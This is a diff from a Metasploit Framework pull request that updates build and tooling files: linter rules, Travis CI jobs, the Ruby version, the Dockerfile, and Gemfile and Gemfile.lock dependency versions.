Merge pull request #1 from bwatters-r7/prep-8509
bypassuac_injection_winsxs updates and documentsbug/bundler_fix
commit
32eb1e9fe6
|
@ -90,7 +90,7 @@ data/java
|
||||||
|
|
||||||
# Avoid checking in Meterpreter libs that are built from
|
# Avoid checking in Meterpreter libs that are built from
|
||||||
# private source. If you're interested in this functionality,
|
# private source. If you're interested in this functionality,
|
||||||
# check out Metasploit Pro: http://metasploit.com/download
|
# check out Metasploit Pro: https://metasploit.com/download
|
||||||
data/meterpreter/ext_server_pivot.*.dll
|
data/meterpreter/ext_server_pivot.*.dll
|
||||||
|
|
||||||
# Avoid checking in metakitty, the source for
|
# Avoid checking in metakitty, the source for
|
||||||
|
|
|
@ -78,7 +78,7 @@ data/java
|
||||||
|
|
||||||
# Avoid checking in Meterpreter libs that are built from
|
# Avoid checking in Meterpreter libs that are built from
|
||||||
# private source. If you're interested in this functionality,
|
# private source. If you're interested in this functionality,
|
||||||
# check out Metasploit Pro: http://metasploit.com/download
|
# check out Metasploit Pro: https://metasploit.com/download
|
||||||
data/meterpreter/ext_server_pivot.*.dll
|
data/meterpreter/ext_server_pivot.*.dll
|
||||||
|
|
||||||
# Avoid checking in metakitty, the source for
|
# Avoid checking in metakitty, the source for
|
||||||
|
@ -91,3 +91,4 @@ docker-compose.local*
|
||||||
|
|
||||||
# Ignore python bytecode
|
# Ignore python bytecode
|
||||||
*.pyc
|
*.pyc
|
||||||
|
rspec.failures
|
||||||
|
|
41
.rubocop.yml
41
.rubocop.yml
|
@ -8,18 +8,57 @@
|
||||||
|
|
||||||
# inherit_from: .rubocop_todo.yml
|
# inherit_from: .rubocop_todo.yml
|
||||||
|
|
||||||
|
AllCops:
|
||||||
|
TargetRubyVersion: 2.2
|
||||||
|
|
||||||
Metrics/ClassLength:
|
Metrics/ClassLength:
|
||||||
Description: 'Most Metasploit modules are quite large. This is ok.'
|
Description: 'Most Metasploit modules are quite large. This is ok.'
|
||||||
Enabled: true
|
Enabled: true
|
||||||
Exclude:
|
Exclude:
|
||||||
- 'modules/**/*'
|
- 'modules/**/*'
|
||||||
|
|
||||||
|
Metrics/AbcSize:
|
||||||
|
Enabled: false
|
||||||
|
Description: 'This is often a red-herring'
|
||||||
|
|
||||||
|
Metrics/CyclomaticComplexity:
|
||||||
|
Enabled: false
|
||||||
|
Description: 'This is often a red-herring'
|
||||||
|
|
||||||
|
Metrics/PerceivedComplexity:
|
||||||
|
Enabled: false
|
||||||
|
Description: 'This is often a red-herring'
|
||||||
|
|
||||||
|
Style/FrozenStringLiteralComment:
|
||||||
|
Enabled: false
|
||||||
|
Description: 'We cannot support this yet without a lot of things breaking'
|
||||||
|
|
||||||
|
Style/RedundantReturn:
|
||||||
|
Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
|
||||||
|
Enabled: false
|
||||||
|
|
||||||
Style/Documentation:
|
Style/Documentation:
|
||||||
Enabled: true
|
Enabled: true
|
||||||
Description: 'Most Metasploit modules do not have class documentation.'
|
Description: 'Most Metasploit modules do not have class documentation.'
|
||||||
Exclude:
|
Exclude:
|
||||||
- 'modules/**/*'
|
- 'modules/**/*'
|
||||||
|
|
||||||
|
Layout/IndentHeredoc:
|
||||||
|
Enabled: false
|
||||||
|
Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
|
||||||
|
|
||||||
|
Style/GuardClause:
|
||||||
|
Enabled: false
|
||||||
|
Description: 'This often introduces bugs in tested code'
|
||||||
|
|
||||||
|
Style/NegatedIf:
|
||||||
|
Enabled: false
|
||||||
|
Description: 'This often introduces bugs in tested code'
|
||||||
|
|
||||||
|
Style/ConditionalAssignment:
|
||||||
|
Enabled: false
|
||||||
|
Description: 'This is confusing for folks coming from other languages'
|
||||||
|
|
||||||
Style/Encoding:
|
Style/Encoding:
|
||||||
Enabled: true
|
Enabled: true
|
||||||
Description: 'We prefer binary to UTF-8.'
|
Description: 'We prefer binary to UTF-8.'
|
||||||
|
@ -53,7 +92,7 @@ Style/NumericLiterals:
|
||||||
Enabled: false
|
Enabled: false
|
||||||
Description: 'This often hurts readability for exploit-ish code.'
|
Description: 'This often hurts readability for exploit-ish code.'
|
||||||
|
|
||||||
Style/SpaceInsideBrackets:
|
Layout/SpaceInsideBrackets:
|
||||||
Enabled: false
|
Enabled: false
|
||||||
Description: 'Until module template are final, most modules will fail this.'
|
Description: 'Until module template are final, most modules will fail this.'
|
||||||
|
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
2.4.1
|
2.4.2
|
||||||
|
|
23
.travis.yml
23
.travis.yml
|
@ -12,20 +12,24 @@ addons:
|
||||||
language: ruby
|
language: ruby
|
||||||
rvm:
|
rvm:
|
||||||
- '2.2'
|
- '2.2'
|
||||||
- '2.3.4'
|
- '2.3.5'
|
||||||
- '2.4.1'
|
- '2.4.2'
|
||||||
|
|
||||||
env:
|
env:
|
||||||
# TODO: restore these tests when the code passes them!
|
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
|
||||||
# - CMD='bundle exec rake cucumber cucumber:boot CREATE_BINSTUBS=true'
|
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
|
||||||
- CMD='bundle exec rake spec SPEC_OPTS="--tag content"'
|
|
||||||
- CMD='bundle exec rake spec SPEC_OPTS="--tag ~content"'
|
|
||||||
|
|
||||||
matrix:
|
matrix:
|
||||||
fast_finish: true
|
fast_finish: true
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
# build docker image
|
||||||
include:
|
include:
|
||||||
- rvm: ruby-head
|
- env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" DOCKER="true"
|
||||||
env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build"
|
# we do not need any setup
|
||||||
|
before_install: skip
|
||||||
|
install: skip
|
||||||
|
before_script: skip
|
||||||
before_install:
|
before_install:
|
||||||
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
|
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
|
||||||
- rake --version
|
- rake --version
|
||||||
|
@ -44,7 +48,8 @@ before_script:
|
||||||
- git diff --exit-code db/schema.rb
|
- git diff --exit-code db/schema.rb
|
||||||
script:
|
script:
|
||||||
- echo "${CMD}"
|
- echo "${CMD}"
|
||||||
- bash -c "${CMD}"
|
# we need travis_wait because the Docker build job can take longer than 10 minutes
|
||||||
|
- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
|
||||||
|
|
||||||
notifications:
|
notifications:
|
||||||
irc: "irc.freenode.org#msfnotify"
|
irc: "irc.freenode.org#msfnotify"
|
||||||
|
|
|
@ -2,7 +2,7 @@
|
||||||
--exclude samples/
|
--exclude samples/
|
||||||
--exclude \.ut\.rb/
|
--exclude \.ut\.rb/
|
||||||
--exclude \.ts\.rb/
|
--exclude \.ts\.rb/
|
||||||
--files CONTRIBUTING.md,COPYING,HACKING,LICENSE
|
--files CONTRIBUTING.md,COPYING,LICENSE
|
||||||
app/**/*.rb
|
app/**/*.rb
|
||||||
lib/msf/**/*.rb
|
lib/msf/**/*.rb
|
||||||
lib/metasploit/**/*.rb
|
lib/metasploit/**/*.rb
|
||||||
|
|
|
@ -119,4 +119,4 @@ already way ahead of the curve, so keep it up!
|
||||||
[YARD]:http://yardoc.org
|
[YARD]:http://yardoc.org
|
||||||
[Issues]:https://github.com/rapid7/metasploit-framework/issues
|
[Issues]:https://github.com/rapid7/metasploit-framework/issues
|
||||||
[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
|
[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
|
||||||
[metasploit-hackers]:https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
|
[metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
FROM ruby:2.4.1-alpine
|
FROM ruby:2.4.2-alpine
|
||||||
MAINTAINER Rapid7
|
MAINTAINER Rapid7
|
||||||
|
|
||||||
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
|
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
|
||||||
|
@ -24,7 +24,6 @@ RUN apk update && \
|
||||||
bison \
|
bison \
|
||||||
build-base \
|
build-base \
|
||||||
ruby-dev \
|
ruby-dev \
|
||||||
libffi-dev\
|
|
||||||
openssl-dev \
|
openssl-dev \
|
||||||
readline-dev \
|
readline-dev \
|
||||||
sqlite-dev \
|
sqlite-dev \
|
||||||
|
@ -35,15 +34,14 @@ RUN apk update && \
|
||||||
yaml-dev \
|
yaml-dev \
|
||||||
zlib-dev \
|
zlib-dev \
|
||||||
ncurses-dev \
|
ncurses-dev \
|
||||||
|
git \
|
||||||
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
|
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
|
||||||
|
&& gem update --system \
|
||||||
|
&& gem install bundler \
|
||||||
&& bundle install --system $BUNDLER_ARGS \
|
&& bundle install --system $BUNDLER_ARGS \
|
||||||
&& apk del .ruby-builddeps \
|
&& apk del .ruby-builddeps \
|
||||||
&& rm -rf /var/cache/apk/*
|
&& rm -rf /var/cache/apk/*
|
||||||
|
|
||||||
# fix for robots gem not readable (known bug)
|
|
||||||
# https://github.com/rapid7/metasploit-framework/issues/6068
|
|
||||||
RUN chmod o+r /usr/local/bundle/gems/robots-*/lib/robots.rb
|
|
||||||
|
|
||||||
RUN adduser -g msfconsole -D $MSF_USER
|
RUN adduser -g msfconsole -D $MSF_USER
|
||||||
|
|
||||||
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
|
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
|
10
Gemfile
10
Gemfile
|
@ -18,9 +18,9 @@ group :development do
|
||||||
gem 'pry'
|
gem 'pry'
|
||||||
# module documentation
|
# module documentation
|
||||||
gem 'octokit'
|
gem 'octokit'
|
||||||
# metasploit-aggregator as a framework only option for now
|
|
||||||
# Metasploit::Aggregator external session proxy
|
# Metasploit::Aggregator external session proxy
|
||||||
gem 'metasploit-aggregator'
|
# Disabled for now for crypttlv updates
|
||||||
|
# gem 'metasploit-aggregator'
|
||||||
end
|
end
|
||||||
|
|
||||||
group :development, :test do
|
group :development, :test do
|
||||||
|
@ -33,14 +33,10 @@ group :development, :test do
|
||||||
# Define `rake spec`. Must be in development AND test so that its available by default as a rake test when the
|
# Define `rake spec`. Must be in development AND test so that its available by default as a rake test when the
|
||||||
# environment is development
|
# environment is development
|
||||||
gem 'rspec-rails'
|
gem 'rspec-rails'
|
||||||
|
gem 'rspec-rerun'
|
||||||
end
|
end
|
||||||
|
|
||||||
group :test do
|
group :test do
|
||||||
# cucumber extension for testing command line applications, like msfconsole
|
|
||||||
gem 'aruba'
|
|
||||||
# cucumber + automatic database cleaning with database_cleaner
|
|
||||||
gem 'cucumber-rails', :require => false
|
|
||||||
gem 'shoulda-matchers'
|
|
||||||
# Manipulate Time.now in specs
|
# Manipulate Time.now in specs
|
||||||
gem 'timecop'
|
gem 'timecop'
|
||||||
end
|
end
|
||||||
|
|
234
Gemfile.lock
234
Gemfile.lock
|
@ -1,13 +1,15 @@
|
||||||
PATH
|
PATH
|
||||||
remote: .
|
remote: .
|
||||||
specs:
|
specs:
|
||||||
metasploit-framework (4.14.25)
|
metasploit-framework (4.16.11)
|
||||||
actionpack (~> 4.2.6)
|
actionpack (~> 4.2.6)
|
||||||
activerecord (~> 4.2.6)
|
activerecord (~> 4.2.6)
|
||||||
activesupport (~> 4.2.6)
|
activesupport (~> 4.2.6)
|
||||||
backports
|
backports
|
||||||
bcrypt
|
bcrypt
|
||||||
|
bcrypt_pbkdf
|
||||||
bit-struct
|
bit-struct
|
||||||
|
dnsruby
|
||||||
filesize
|
filesize
|
||||||
jsobfu
|
jsobfu
|
||||||
json
|
json
|
||||||
|
@ -15,9 +17,9 @@ PATH
|
||||||
metasploit-concern
|
metasploit-concern
|
||||||
metasploit-credential
|
metasploit-credential
|
||||||
metasploit-model
|
metasploit-model
|
||||||
metasploit-payloads (= 1.2.29)
|
metasploit-payloads (= 1.3.9)
|
||||||
metasploit_data_models
|
metasploit_data_models
|
||||||
metasploit_payloads-mettle (= 0.1.9)
|
metasploit_payloads-mettle (= 0.2.2)
|
||||||
msgpack
|
msgpack
|
||||||
nessus_rest
|
nessus_rest
|
||||||
net-ssh
|
net-ssh
|
||||||
|
@ -30,9 +32,12 @@ PATH
|
||||||
packetfu
|
packetfu
|
||||||
patch_finder
|
patch_finder
|
||||||
pcaprub
|
pcaprub
|
||||||
pg
|
pdf-reader
|
||||||
|
pg (= 0.20.0)
|
||||||
railties
|
railties
|
||||||
rb-readline
|
rb-readline
|
||||||
|
rbnacl (< 5.0.0)
|
||||||
|
rbnacl-libsodium
|
||||||
recog
|
recog
|
||||||
redcarpet
|
redcarpet
|
||||||
rex-arch
|
rex-arch
|
||||||
|
@ -44,7 +49,7 @@ PATH
|
||||||
rex-mime
|
rex-mime
|
||||||
rex-nop
|
rex-nop
|
||||||
rex-ole
|
rex-ole
|
||||||
rex-powershell
|
rex-powershell (< 0.1.73)
|
||||||
rex-random_identifier
|
rex-random_identifier
|
||||||
rex-registry
|
rex-registry
|
||||||
rex-rop_builder
|
rex-rop_builder
|
||||||
|
@ -53,7 +58,6 @@ PATH
|
||||||
rex-struct2
|
rex-struct2
|
||||||
rex-text
|
rex-text
|
||||||
rex-zip
|
rex-zip
|
||||||
robots
|
|
||||||
ruby_smb
|
ruby_smb
|
||||||
rubyntlm
|
rubyntlm
|
||||||
rubyzip
|
rubyzip
|
||||||
|
@ -62,141 +66,94 @@ PATH
|
||||||
tzinfo
|
tzinfo
|
||||||
tzinfo-data
|
tzinfo-data
|
||||||
windows_error
|
windows_error
|
||||||
|
xdr
|
||||||
xmlrpc
|
xmlrpc
|
||||||
|
|
||||||
GEM
|
GEM
|
||||||
remote: https://rubygems.org/
|
remote: https://rubygems.org/
|
||||||
specs:
|
specs:
|
||||||
actionpack (4.2.8)
|
Ascii85 (1.0.2)
|
||||||
actionview (= 4.2.8)
|
actionpack (4.2.10)
|
||||||
activesupport (= 4.2.8)
|
actionview (= 4.2.10)
|
||||||
|
activesupport (= 4.2.10)
|
||||||
rack (~> 1.6)
|
rack (~> 1.6)
|
||||||
rack-test (~> 0.6.2)
|
rack-test (~> 0.6.2)
|
||||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||||
rails-html-sanitizer (~> 1.0, >= 1.0.2)
|
rails-html-sanitizer (~> 1.0, >= 1.0.2)
|
||||||
actionview (4.2.8)
|
actionview (4.2.10)
|
||||||
activesupport (= 4.2.8)
|
activesupport (= 4.2.10)
|
||||||
builder (~> 3.1)
|
builder (~> 3.1)
|
||||||
erubis (~> 2.7.0)
|
erubis (~> 2.7.0)
|
||||||
rails-dom-testing (~> 1.0, >= 1.0.5)
|
rails-dom-testing (~> 1.0, >= 1.0.5)
|
||||||
rails-html-sanitizer (~> 1.0, >= 1.0.3)
|
rails-html-sanitizer (~> 1.0, >= 1.0.3)
|
||||||
activemodel (4.2.8)
|
activemodel (4.2.10)
|
||||||
activesupport (= 4.2.8)
|
activesupport (= 4.2.10)
|
||||||
builder (~> 3.1)
|
builder (~> 3.1)
|
||||||
activerecord (4.2.8)
|
activerecord (4.2.10)
|
||||||
activemodel (= 4.2.8)
|
activemodel (= 4.2.10)
|
||||||
activesupport (= 4.2.8)
|
activesupport (= 4.2.10)
|
||||||
arel (~> 6.0)
|
arel (~> 6.0)
|
||||||
activesupport (4.2.8)
|
activesupport (4.2.10)
|
||||||
i18n (~> 0.7)
|
i18n (~> 0.7)
|
||||||
minitest (~> 5.1)
|
minitest (~> 5.1)
|
||||||
thread_safe (~> 0.3, >= 0.3.4)
|
thread_safe (~> 0.3, >= 0.3.4)
|
||||||
tzinfo (~> 1.1)
|
tzinfo (~> 1.1)
|
||||||
addressable (2.5.1)
|
addressable (2.5.2)
|
||||||
public_suffix (~> 2.0, >= 2.0.2)
|
public_suffix (>= 2.0.2, < 4.0)
|
||||||
|
afm (0.2.2)
|
||||||
arel (6.0.4)
|
arel (6.0.4)
|
||||||
arel-helpers (2.4.0)
|
arel-helpers (2.4.0)
|
||||||
activerecord (>= 3.1.0, < 6)
|
activerecord (>= 3.1.0, < 6)
|
||||||
aruba (0.14.2)
|
|
||||||
childprocess (~> 0.5.6)
|
|
||||||
contracts (~> 0.9)
|
|
||||||
cucumber (>= 1.3.19)
|
|
||||||
ffi (~> 1.9.10)
|
|
||||||
rspec-expectations (>= 2.99)
|
|
||||||
thor (~> 0.19)
|
|
||||||
backports (3.8.0)
|
backports (3.8.0)
|
||||||
bcrypt (3.1.11)
|
bcrypt (3.1.11)
|
||||||
bindata (2.4.0)
|
bcrypt_pbkdf (1.0.0)
|
||||||
|
bindata (2.4.1)
|
||||||
bit-struct (0.16)
|
bit-struct (0.16)
|
||||||
builder (3.2.3)
|
builder (3.2.3)
|
||||||
capybara (2.14.0)
|
coderay (1.1.2)
|
||||||
addressable
|
crass (1.0.2)
|
||||||
mime-types (>= 1.16)
|
|
||||||
nokogiri (>= 1.3.3)
|
|
||||||
rack (>= 1.0.0)
|
|
||||||
rack-test (>= 0.5.4)
|
|
||||||
xpath (~> 2.0)
|
|
||||||
childprocess (0.5.9)
|
|
||||||
ffi (~> 1.0, >= 1.0.11)
|
|
||||||
coderay (1.1.1)
|
|
||||||
contracts (0.16.0)
|
|
||||||
cucumber (2.4.0)
|
|
||||||
builder (>= 2.1.2)
|
|
||||||
cucumber-core (~> 1.5.0)
|
|
||||||
cucumber-wire (~> 0.0.1)
|
|
||||||
diff-lcs (>= 1.1.3)
|
|
||||||
gherkin (~> 4.0)
|
|
||||||
multi_json (>= 1.7.5, < 2.0)
|
|
||||||
multi_test (>= 0.1.2)
|
|
||||||
cucumber-core (1.5.0)
|
|
||||||
gherkin (~> 4.0)
|
|
||||||
cucumber-rails (1.5.0)
|
|
||||||
capybara (>= 1.1.2, < 3)
|
|
||||||
cucumber (>= 1.3.8, < 4)
|
|
||||||
mime-types (>= 1.17, < 4)
|
|
||||||
nokogiri (~> 1.5)
|
|
||||||
railties (>= 4, < 5.2)
|
|
||||||
cucumber-wire (0.0.1)
|
|
||||||
diff-lcs (1.3)
|
diff-lcs (1.3)
|
||||||
|
dnsruby (1.60.2)
|
||||||
docile (1.1.5)
|
docile (1.1.5)
|
||||||
erubis (2.7.0)
|
erubis (2.7.0)
|
||||||
factory_girl (4.8.0)
|
factory_girl (4.8.1)
|
||||||
activesupport (>= 3.0.0)
|
activesupport (>= 3.0.0)
|
||||||
factory_girl_rails (4.8.0)
|
factory_girl_rails (4.8.0)
|
||||||
factory_girl (~> 4.8.0)
|
factory_girl (~> 4.8.0)
|
||||||
railties (>= 3.0.0)
|
railties (>= 3.0.0)
|
||||||
faraday (0.12.1)
|
faraday (0.13.1)
|
||||||
multipart-post (>= 1.2, < 3)
|
multipart-post (>= 1.2, < 3)
|
||||||
ffi (1.9.18)
|
ffi (1.9.18)
|
||||||
filesize (0.1.1)
|
filesize (0.1.1)
|
||||||
fivemat (1.3.4)
|
fivemat (1.3.5)
|
||||||
gherkin (4.1.3)
|
hashery (2.1.2)
|
||||||
google-protobuf (3.3.0)
|
i18n (0.8.6)
|
||||||
googleauth (0.5.1)
|
|
||||||
faraday (~> 0.9)
|
|
||||||
jwt (~> 1.4)
|
|
||||||
logging (~> 2.0)
|
|
||||||
memoist (~> 0.12)
|
|
||||||
multi_json (~> 1.11)
|
|
||||||
os (~> 0.9)
|
|
||||||
signet (~> 0.7)
|
|
||||||
grpc (1.3.4)
|
|
||||||
google-protobuf (~> 3.1)
|
|
||||||
googleauth (~> 0.5.1)
|
|
||||||
i18n (0.8.4)
|
|
||||||
jsobfu (0.4.2)
|
jsobfu (0.4.2)
|
||||||
rkelly-remix
|
rkelly-remix
|
||||||
json (2.1.0)
|
json (2.1.0)
|
||||||
jwt (1.5.6)
|
loofah (2.1.1)
|
||||||
little-plugger (1.1.4)
|
crass (~> 1.0.2)
|
||||||
logging (2.2.2)
|
|
||||||
little-plugger (~> 1.1)
|
|
||||||
multi_json (~> 1.10)
|
|
||||||
loofah (2.0.3)
|
|
||||||
nokogiri (>= 1.5.9)
|
nokogiri (>= 1.5.9)
|
||||||
memoist (0.15.0)
|
|
||||||
metasm (1.0.3)
|
metasm (1.0.3)
|
||||||
metasploit-aggregator (0.2.1)
|
metasploit-concern (2.0.5)
|
||||||
grpc
|
|
||||||
rex-arch
|
|
||||||
metasploit-concern (2.0.4)
|
|
||||||
activemodel (~> 4.2.6)
|
activemodel (~> 4.2.6)
|
||||||
activesupport (~> 4.2.6)
|
activesupport (~> 4.2.6)
|
||||||
railties (~> 4.2.6)
|
railties (~> 4.2.6)
|
||||||
metasploit-credential (2.0.9)
|
metasploit-credential (2.0.12)
|
||||||
metasploit-concern
|
metasploit-concern
|
||||||
metasploit-model
|
metasploit-model
|
||||||
metasploit_data_models
|
metasploit_data_models
|
||||||
pg
|
pg
|
||||||
railties
|
railties
|
||||||
|
rex-socket
|
||||||
rubyntlm
|
rubyntlm
|
||||||
rubyzip
|
rubyzip
|
||||||
metasploit-model (2.0.4)
|
metasploit-model (2.0.4)
|
||||||
activemodel (~> 4.2.6)
|
activemodel (~> 4.2.6)
|
||||||
activesupport (~> 4.2.6)
|
activesupport (~> 4.2.6)
|
||||||
railties (~> 4.2.6)
|
railties (~> 4.2.6)
|
||||||
metasploit-payloads (1.2.29)
|
metasploit-payloads (1.3.9)
|
||||||
metasploit_data_models (2.0.14)
|
metasploit_data_models (2.0.15)
|
||||||
activerecord (~> 4.2.6)
|
activerecord (~> 4.2.6)
|
||||||
activesupport (~> 4.2.6)
|
activesupport (~> 4.2.6)
|
||||||
arel-helpers
|
arel-helpers
|
||||||
|
@ -206,43 +163,42 @@ GEM
|
||||||
postgres_ext
|
postgres_ext
|
||||||
railties (~> 4.2.6)
|
railties (~> 4.2.6)
|
||||||
recog (~> 2.0)
|
recog (~> 2.0)
|
||||||
metasploit_payloads-mettle (0.1.9)
|
metasploit_payloads-mettle (0.2.2)
|
||||||
method_source (0.8.2)
|
method_source (0.9.0)
|
||||||
mime-types (3.1)
|
mini_portile2 (2.3.0)
|
||||||
mime-types-data (~> 3.2015)
|
minitest (5.10.3)
|
||||||
mime-types-data (3.2016.0521)
|
|
||||||
mini_portile2 (2.1.0)
|
|
||||||
minitest (5.10.2)
|
|
||||||
msgpack (1.1.0)
|
msgpack (1.1.0)
|
||||||
multi_json (1.12.1)
|
|
||||||
multi_test (0.1.2)
|
|
||||||
multipart-post (2.0.0)
|
multipart-post (2.0.0)
|
||||||
nessus_rest (0.1.6)
|
nessus_rest (0.1.6)
|
||||||
net-ssh (4.1.0)
|
net-ssh (4.2.0)
|
||||||
network_interface (0.0.1)
|
network_interface (0.0.2)
|
||||||
nexpose (6.0.0)
|
nexpose (7.1.1)
|
||||||
nokogiri (1.7.2)
|
nokogiri (1.8.1)
|
||||||
mini_portile2 (~> 2.1.0)
|
mini_portile2 (~> 2.3.0)
|
||||||
octokit (4.7.0)
|
octokit (4.7.0)
|
||||||
sawyer (~> 0.8.0, >= 0.5.3)
|
sawyer (~> 0.8.0, >= 0.5.3)
|
||||||
openssl-ccm (1.2.1)
|
openssl-ccm (1.2.1)
|
||||||
openvas-omp (0.0.4)
|
openvas-omp (0.0.4)
|
||||||
os (0.9.6)
|
|
||||||
packetfu (1.1.13)
|
packetfu (1.1.13)
|
||||||
pcaprub
|
pcaprub
|
||||||
patch_finder (1.0.2)
|
patch_finder (1.0.2)
|
||||||
pcaprub (0.12.4)
|
pcaprub (0.12.4)
|
||||||
|
pdf-reader (2.0.0)
|
||||||
|
Ascii85 (~> 1.0.0)
|
||||||
|
afm (~> 0.2.1)
|
||||||
|
hashery (~> 2.0)
|
||||||
|
ruby-rc4
|
||||||
|
ttfunk
|
||||||
pg (0.20.0)
|
pg (0.20.0)
|
||||||
pg_array_parser (0.0.9)
|
pg_array_parser (0.0.9)
|
||||||
postgres_ext (3.0.0)
|
postgres_ext (3.0.0)
|
||||||
activerecord (>= 4.0.0)
|
activerecord (>= 4.0.0)
|
||||||
arel (>= 4.0.1)
|
arel (>= 4.0.1)
|
||||||
pg_array_parser (~> 0.0.9)
|
pg_array_parser (~> 0.0.9)
|
||||||
pry (0.10.4)
|
pry (0.11.1)
|
||||||
coderay (~> 1.1.0)
|
coderay (~> 1.1.0)
|
||||||
method_source (~> 0.8.1)
|
method_source (~> 0.9.0)
|
||||||
slop (~> 3.4)
|
public_suffix (3.0.0)
|
||||||
public_suffix (2.0.5)
|
|
||||||
rack (1.6.8)
|
rack (1.6.8)
|
||||||
rack-test (0.6.3)
|
rack-test (0.6.3)
|
||||||
rack (>= 1.0)
|
rack (>= 1.0)
|
||||||
|
@ -254,25 +210,29 @@ GEM
|
||||||
rails-deprecated_sanitizer (>= 1.0.1)
|
rails-deprecated_sanitizer (>= 1.0.1)
|
||||||
rails-html-sanitizer (1.0.3)
|
rails-html-sanitizer (1.0.3)
|
||||||
loofah (~> 2.0)
|
loofah (~> 2.0)
|
||||||
railties (4.2.8)
|
railties (4.2.10)
|
||||||
actionpack (= 4.2.8)
|
actionpack (= 4.2.10)
|
||||||
activesupport (= 4.2.8)
|
activesupport (= 4.2.10)
|
||||||
rake (>= 0.8.7)
|
rake (>= 0.8.7)
|
||||||
thor (>= 0.18.1, < 2.0)
|
thor (>= 0.18.1, < 2.0)
|
||||||
rake (12.0.0)
|
rake (12.1.0)
|
||||||
rb-readline (0.5.4)
|
rb-readline (0.5.5)
|
||||||
recog (2.1.8)
|
rbnacl (4.0.2)
|
||||||
|
ffi
|
||||||
|
rbnacl-libsodium (1.0.13)
|
||||||
|
rbnacl (>= 3.0.1)
|
||||||
|
recog (2.1.15)
|
||||||
nokogiri
|
nokogiri
|
||||||
redcarpet (3.4.0)
|
redcarpet (3.4.0)
|
||||||
rex-arch (0.1.8)
|
rex-arch (0.1.11)
|
||||||
rex-text
|
rex-text
|
||||||
rex-bin_tools (0.1.3)
|
rex-bin_tools (0.1.4)
|
||||||
metasm
|
metasm
|
||||||
rex-arch
|
rex-arch
|
||||||
rex-core
|
rex-core
|
||||||
rex-struct2
|
rex-struct2
|
||||||
rex-text
|
rex-text
|
||||||
rex-core (0.1.10)
|
rex-core (0.1.12)
|
||||||
rex-encoder (0.1.4)
|
rex-encoder (0.1.4)
|
||||||
metasm
|
metasm
|
||||||
rex-arch
|
rex-arch
|
||||||
|
@ -293,16 +253,17 @@ GEM
|
||||||
rex-powershell (0.1.72)
|
rex-powershell (0.1.72)
|
||||||
rex-random_identifier
|
rex-random_identifier
|
||||||
rex-text
|
rex-text
|
||||||
rex-random_identifier (0.1.2)
|
rex-random_identifier (0.1.4)
|
||||||
rex-text
|
rex-text
|
||||||
rex-registry (0.1.3)
|
rex-registry (0.1.3)
|
||||||
rex-rop_builder (0.1.3)
|
rex-rop_builder (0.1.3)
|
||||||
metasm
|
metasm
|
||||||
rex-core
|
rex-core
|
||||||
rex-text
|
rex-text
|
||||||
rex-socket (0.1.6)
|
rex-socket (0.1.8)
|
||||||
|
rex-core
|
||||||
|
rex-sslscan (0.1.5)
|
||||||
rex-core
|
rex-core
|
||||||
rex-sslscan (0.1.4)
|
|
||||||
rex-socket
|
rex-socket
|
||||||
rex-text
|
rex-text
|
||||||
rex-struct2 (0.1.2)
|
rex-struct2 (0.1.2)
|
||||||
|
@ -310,7 +271,10 @@ GEM
|
||||||
rex-zip (0.1.3)
|
rex-zip (0.1.3)
|
||||||
rex-text
|
rex-text
|
||||||
rkelly-remix (0.0.7)
|
rkelly-remix (0.0.7)
|
||||||
robots (0.10.1)
|
rspec (3.6.0)
|
||||||
|
rspec-core (~> 3.6.0)
|
||||||
|
rspec-expectations (~> 3.6.0)
|
||||||
|
rspec-mocks (~> 3.6.0)
|
||||||
rspec-core (3.6.0)
|
rspec-core (3.6.0)
|
||||||
rspec-support (~> 3.6.0)
|
rspec-support (~> 3.6.0)
|
||||||
rspec-expectations (3.6.0)
|
rspec-expectations (3.6.0)
|
||||||
|
@ -319,7 +283,7 @@ GEM
|
||||||
rspec-mocks (3.6.0)
|
rspec-mocks (3.6.0)
|
||||||
diff-lcs (>= 1.2.0, < 2.0)
|
diff-lcs (>= 1.2.0, < 2.0)
|
||||||
rspec-support (~> 3.6.0)
|
rspec-support (~> 3.6.0)
|
||||||
rspec-rails (3.6.0)
|
rspec-rails (3.6.1)
|
||||||
actionpack (>= 3.0)
|
actionpack (>= 3.0)
|
||||||
activesupport (>= 3.0)
|
activesupport (>= 3.0)
|
||||||
railties (>= 3.0)
|
railties (>= 3.0)
|
||||||
|
@ -327,7 +291,10 @@ GEM
|
||||||
rspec-expectations (~> 3.6.0)
|
rspec-expectations (~> 3.6.0)
|
||||||
rspec-mocks (~> 3.6.0)
|
rspec-mocks (~> 3.6.0)
|
||||||
rspec-support (~> 3.6.0)
|
rspec-support (~> 3.6.0)
|
||||||
|
rspec-rerun (1.1.0)
|
||||||
|
rspec (~> 3.0)
|
||||||
rspec-support (3.6.0)
|
rspec-support (3.6.0)
|
||||||
|
ruby-rc4 (0.1.5)
|
||||||
ruby_smb (0.0.18)
|
ruby_smb (0.0.18)
|
||||||
bindata
|
bindata
|
||||||
rubyntlm
|
rubyntlm
|
||||||
|
@ -337,53 +304,44 @@ GEM
|
||||||
sawyer (0.8.1)
|
sawyer (0.8.1)
|
